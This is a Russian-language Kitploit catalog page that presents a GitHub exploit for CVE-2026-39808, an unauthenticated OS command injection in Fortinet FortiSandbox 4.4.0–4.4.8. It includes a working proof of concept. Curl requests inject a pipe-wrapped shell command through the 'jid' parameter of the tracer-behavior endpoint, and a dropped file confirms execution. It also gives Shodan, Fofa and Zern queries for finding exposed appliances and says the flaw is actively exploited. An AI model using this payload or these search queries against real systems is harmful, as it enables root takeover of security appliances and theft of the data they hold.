Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-39808 — Fortinet FortiSandbox 4.4.0-4.4.8 - Внедрение команд ОС через конечную точку tracer-behavior | Kitploit
Инструменты/GitHubGitHub/error-inside/cve-2026-39808
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование
GitHuberror-inside/cve-2026-39808

CVE-2026-39808

Fortinet FortiSandbox 4.4.0-4.4.8 - Внедрение команд ОС через конечную точку tracer-behavior

Репозиторий
2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-39808

Python CVSS License Educational

Fortinet FortiSandbox 4.4.0-4.4.8 — внедрение OS-команд через конечную точку tracer-behavior

Fortinet FortiSandbox — это современное решение для защиты от угроз, которое создает изолированные среды для анализа подозрительных файлов, URL-адресов и сетевого трафика на предмет вредоносного поведения. Оно сочетает статический анализ, динамический анализ, машинное обучение на основе ИИ и аналитику угроз от FortiGuard для обнаружения угроз нулевого дня, вредоносного ПО, уклоняющегося от обнаружения, программ-вымогателей и целевых атак, которые обходят традиционные сигнатурные методы защиты. Предприятиям следует развертывать FortiSandbox для защиты от новых угроз — особенно от неизвестного вредоносного ПО и сложных постоянных угроз (APT); решение автоматически «детонирует» подозрительный контент в безопасной изолированной среде до того, как он попадет в рабочие системы. Оно интегрируется с более широкой экосистемой Fortinet Security Fabric и может развертываться как физическое устройство, виртуальная машина, облачный сервис или контейнерное решение для различных сетевых архитектур.

CVE-2026-39808 — это критическая уязвимость внедрения команд операционной системы, затрагивающая FortiSandbox версий 4.4.0–4.4.8. Недостаток вызван некорректной нейтрализацией специальных элементов в пользовательском вводе перед его использованием при формировании команд ОС (CWE-78) и затрагивает неуказанную конечную точку API. Неаутентифицированный злоумышленник может воспользоваться этой уязвимостью, отправляя специально сформированные HTTP-запросы для выполнения произвольных команд операционной системы с привилегиями root на базовой системе. Успешная эксплуатация дает злоумышленнику полный контроль над устройством FortiSandbox, позволяя получать доступ к проанализированным образцам вредоносного ПО, похищать конфиденциальные данные конфигурации, переходить в подключенные сегменты сети или использовать скомпрометированное устройство в качестве плацдарма для дальнейшего бокового перемещения внутри корпоративной среды. Эта уязвимость активно эксплуатируется в реальных атаках.

PoC

root@kitploit:~
# Step 1 — inject: write a marker string to a temp .php file via pipe in jid param
# Decoded payload: |(echo canary > /web/ng/proof.php)|
curl -sk -o /dev/null -w "%{http_code}" \
  "http://example.com/fortisandbox/job-detail/tracer-behavior?jid=%7c%28echo+canary+%3e+%2fweb%2fng%2fproof.php%29%7c" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Connection: close"

# Step 2 — verify: fetch the dropped file and check for the marker
curl -sk "http://example.com/ng/proof.php" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Connection: close"

Использование

root@kitploit:~
python CVE-2026-39808-X7.py
  • Zern : title:FortiSandbox
  • Fofa : title="FortiSandbox"
  • Shodan : http.title:FortiSandbox

Ресурсы

  • OpenCVE — CVE-2026-39808 — внедрение OS-команд в выпусках FortiSandbox 4.4.x
  • NIST — сведения о CVE-2026-39808
  • Fortinet FortiSandbox

Отказ от ответственности

Этот репозиторий и его содержимое предоставляются исключительно для легитимных исследований в области безопасности, авторизованного тестирования на проникновение, образовательного изучения и защитных целей. Получая доступ к этому материалу или используя его, вы подтверждаете полную ответственность за соответствие ваших действий всем применимым законам и за получение надлежащего разрешения перед тестированием или применением этих методов к любой системе, которая вам не принадлежит.

Авторы и сопровождающие этого проекта не несут ответственности за любой ущерб, юридические последствия или неправомерное использование, возникшие в результате применения этой информации. Любое использование для несанкционированного доступа, вредоносной деятельности или незаконных целей прямо запрещено и не поддерживается.

Используйте ответственно. Оставайтесь в рамках закона. Тестируйте только то, чем владеете или на тестирование чего имеете явное письменное разрешение.

Авторы

  • ErrorInside // SCT

Лицензия

SCT-PL

Скачать инструмент